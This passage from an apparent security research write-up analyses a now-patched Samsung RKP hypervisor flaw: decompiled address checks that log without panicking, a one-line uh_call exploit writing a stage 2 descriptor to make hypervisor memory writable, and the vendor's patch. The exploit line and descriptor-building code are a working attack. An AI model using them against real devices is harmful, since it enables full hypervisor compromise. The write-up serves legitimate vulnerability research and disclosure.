Now we turn our attention to rkp_get_pa, which is called by many command handlers to convert kernel-provided virtual addresses into physical addresses. If the virtual address is in the fixmap, it calculates the physical address from the PHYS_OFFSET (start of the kernel physical memory). If it is not in the fixmap, it calls virt_to_phys_el1 to perform a hardware translation. If that hardware translation doesn't succeed, it calculates the physical address from either the PHYS_OFFSET or the KIMAGE_VOFFSET (offset between kernel VAs and PAs), depending on the address. Finally, it calls check_kernel_input to check whether that address can be used or not.

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  return paddr;
}

virt_to_phys_el1 uses the AT S12E1R (stage 1 & 2 at EL1 read access) instruction to translate the virtual address. If that translation, simulating a kernel read access, fails, it uses the AT S12E1W (stage 1 & 2 at EL1 write access) instruction. If that translation, simulating a kernel write access, fails and the MMU is enabled, it will print the stack contents.

int64_t virt_to_phys_el1(int64_t vaddr) {
  // ...

  if (vaddr) {
    at_s12e1r(vaddr);
    par_el1 = get_par_el1();
    if ((par_el1 & 1) != 0) {
      at_s12e1w(vaddr);
      par_el1 = get_par_el1();
    }
    if ((par_el1 & 1) != 0) {
      if ((get_sctlr_el1() & 1) != 0) {
        uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
        if (!has_printed_stack_contents) {
          has_printed_stack_contents = 1;
          print_stack_contents();
        }
        has_printed_stack_contents = 0;
      }
      vaddr = 0;
    } else {
      vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
    }
  }
  return vaddr;
}

The check_kernel_input function determines whether the kernel-provided VA, once converted into a PA, can be used safely. It only checks if the physical address is contained in the protected_ranges memlist which, as stated in the Overall State After Startup section, contains the hypervisor's own memory ranges after startup.

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = protected_ranges_contains(paddr);
  if (res) {
    res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

This should effectively prevent the kernel from giving an address that, once translated, falls into hypervisor memory. However, when the check fails (i.e. the address does fall into a protected range), the uh_log function is called with an 'L' level and not a 'D' one, meaning that the hypervisor will not panic and execution will continue as if nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.

Exploitation

Exploiting this vulnerability is trivial. It suffices to call one of the command handlers with the right arguments to immediately obtain an arbitrary write. For example, we can use the RKP_CMD_WRITE_PGT3 command, which is handled by the rkp_l3pgt_write function that we have seen earlier. It is only a matter of finding what to write and where to write it to compromise the hypervisor.

Below is our one-liner exploit that targets the stage 2 page tables of our device by adding a level 2 block descriptor spanning the whole hypervisor memory. By setting the S2AP bits of the descriptor to 0b11, the memory mapping is writable, and because the WXN bit set in s1_enable only applies to the address translation at EL2 and not at EL1, we can now freely modify the hypervisor code from the kernel.

uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd, 0, 0);
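
For reference, here is how the descriptor value 0x870004fd breaks down, assuming the standard VMSAv8-64 stage 2 block descriptor format for a 4 KB granule (the kernel virtual address of the targeted stage 2 table entry is of course specific to our device and firmware):

#include <stdint.h>
#include <stdio.h>

int main(void) {
  // Assemble the level 2 block descriptor (maps a 2 MB block) from its fields.
  uint64_t output_address = 0x87000000;  // bits [47:21], the 2 MB block covering hypervisor memory
  uint64_t af             = 1ull << 10;  // access flag
  uint64_t sh             = 0ull << 8;   // shareability: non-shareable
  uint64_t s2ap           = 3ull << 6;   // stage 2 access permissions: read/write
  uint64_t memattr        = 0xfull << 2; // normal memory, write-back cacheable
  uint64_t block          = 1ull << 0;   // descriptor type: block (not table)

  // Prints 0x870004fd, the value passed to the hypervisor above.
  printf("%#llx\n", (unsigned long long)(output_address | af | sh | s2ap | memattr | block));
  return 0;
}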

Patch

We noticed that binaries built after May 27 2020 include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. The vulnerability should have affected all devices with Exynos and Snapdragon chipsets.

Let's take a look at the latest firmware update available for our research device to see what the changes are. First, the check_kernel_input function. Interestingly, instead of simply changing the log level, they duplicated the call to uh_log. It's weird but at least it does the job.

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = protected_ranges_contains(paddr);
  if (res) {
    uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
    uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

We also noticed while binary diffing that they added some extra checks in rkp_get_pa. They are now enforcing that the physical address be contained in the dynamic_regions memlist. Better safe than sorry!

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
    uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
    uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
  }
  return paddr;
}

Conclusion

Let's recap the various protections offered by Samsung RKP:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but in that case the PXNTable bit is set;
  • double mappings are prevented, but the checking is only done by the kernel;
    • still can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved into the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;
    • at various operations, the credentials of a running task are checked:
      • a task that was not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct,
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

In this deep dive into Samsung RKP's internals, we have seen how a security hypervisor can help against kernel exploitation. Like other defense-in-depth measures, it makes it harder for an attacker who has gained read-write access to fully compromise the kernel. But this great engineering work doesn't prevent making (sometimes simple) mistakes in the implementation.

There are a lot more things about the hypervisor that we did not mention here but that deserve a follow-up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining the differences between Exynos and Snapdragon implementations, digging into the new framework of the S20, etc.

References